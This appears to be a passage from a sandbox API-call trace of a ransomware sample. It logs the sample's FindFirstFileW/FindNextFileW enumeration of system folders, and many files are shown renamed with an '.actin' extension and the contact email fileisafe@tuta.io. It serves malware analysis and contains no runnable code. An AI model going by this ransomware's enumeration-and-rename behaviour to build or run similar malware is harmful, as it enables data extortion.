ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0134.746] FindClose (in: hFindFile=0x1326f58 | out: hFindFile=0x1326f58) returned 1 [0134.746] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43a1ad0 | out: hHeap=0x2cb0000) returned 1 [0134.746] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff718, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0134.746] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x46bf844 | out: lpFindFileData=0x46bf844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff718, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0134.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*", lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName=".", cAlternateFileName="")) returned 0x13273d8 [0135.250] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="..", cAlternateFileName="")) returned 1 [0135.251] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1025", cAlternateFileName="")) returned 1 [0135.251] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1028", cAlternateFileName="")) returned 1 [0135.251] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1029", cAlternateFileName="")) returned 1 [0135.251] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1030", cAlternateFileName="")) returned 1 [0135.251] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1031", cAlternateFileName="")) returned 1 [0135.251] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1032", cAlternateFileName="")) returned 1 [0135.251] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1033", cAlternateFileName="")) returned 1 [0135.251] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1035", cAlternateFileName="")) returned 1 [0135.251] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1036", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1037", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1038", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1040", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1041", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1042", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1043", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1044", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1045", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1046", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1049", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1053", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="1055", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="2052", cAlternateFileName="")) returned 1 [0135.252] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="2070", cAlternateFileName="")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="3076", cAlternateFileName="")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="3082", cAlternateFileName="")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Client", cAlternateFileName="")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dde06a3, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7dde06a3, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7e27b96b, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4002, dwReserved0=0x430054, dwReserved1=0x153, cFileName="DHtmlHeader.html.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DHTMLH~1.ACT")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e22f2bf, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7e22f2bf, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7e255589, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x15ad2, dwReserved0=0x430054, dwReserved1=0x153, cFileName="DisplayIcon.ico.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DISPLA~1.ACT")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Extended", cAlternateFileName="")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x153, cFileName="Graphics", cAlternateFileName="")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e84b37a, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7e84b37a, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7e84b37a, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf22, dwReserved0=0x430054, dwReserved1=0x153, cFileName="header.bmp.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="HEADER~1.ACT")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x80c34c35, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xadd395d, dwReserved0=0x430054, dwReserved1=0x153, cFileName="netfx_Core.mzz.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NETFX_~1.ACT")) returned 1 [0135.253] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x7f2b98b0, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x290312, dwReserved0=0x430054, dwReserved1=0x153, cFileName="netfx_Core_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NETFX_~2.ACT")) returned 1 [0135.254] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f2b98b0, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7f2b98b0, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7f99469c, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x11c112, dwReserved0=0x430054, dwReserved1=0x153, cFileName="netfx_Core_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NETFX_~3.ACT")) returned 1 [0135.254] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x822da238, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x29e23d9, dwReserved0=0x430054, dwReserved1=0x153, cFileName="netfx_Extended.mzz.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NETFX_~4.ACT")) returned 1 [0135.254] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c34c35, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x80c34c35, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x810c7e7b, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xd5112, dwReserved0=0x430054, dwReserved1=0x153, cFileName="netfx_Extended_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NEDD84~1.ACT")) returned 1 [0135.254] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x810edfa9, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x810edfa9, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x8158cadf, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x79112, dwReserved0=0x430054, dwReserved1=0x153, cFileName="netfx_Extended_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="NE819E~1.ACT")) returned 1 [0135.254] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x815b2c14, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x815b2c14, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x81b5760d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x427b2, dwReserved0=0x430054, dwReserved1=0x153, cFileName="ParameterInfo.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARAME~1.ACT")) returned 1 [0135.254] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81b5760d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x81b5760d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x81b7dab2, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x2d312, dwReserved0=0x430054, dwReserved1=0x153, cFileName="RGB9RAST_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="RGB9RA~1.ACT")) returned 1 [0135.254] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81b7dab2, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x81b7dab2, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82042819, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x17312, dwReserved0=0x430054, dwReserved1=0x153, cFileName="RGB9Rast_x86.msi.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="RGB9RA~2.ACT")) returned 1 [0135.255] FindNextFileW (in: hFindFile=0x13273d8, lpFindFileData=0x46bf5c0 | out: lpFindFileData=0x46bf5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82068cae, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x82068cae, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x82068cae, ftLastWriteTime.dwHighDateTime=0x1d5328f, 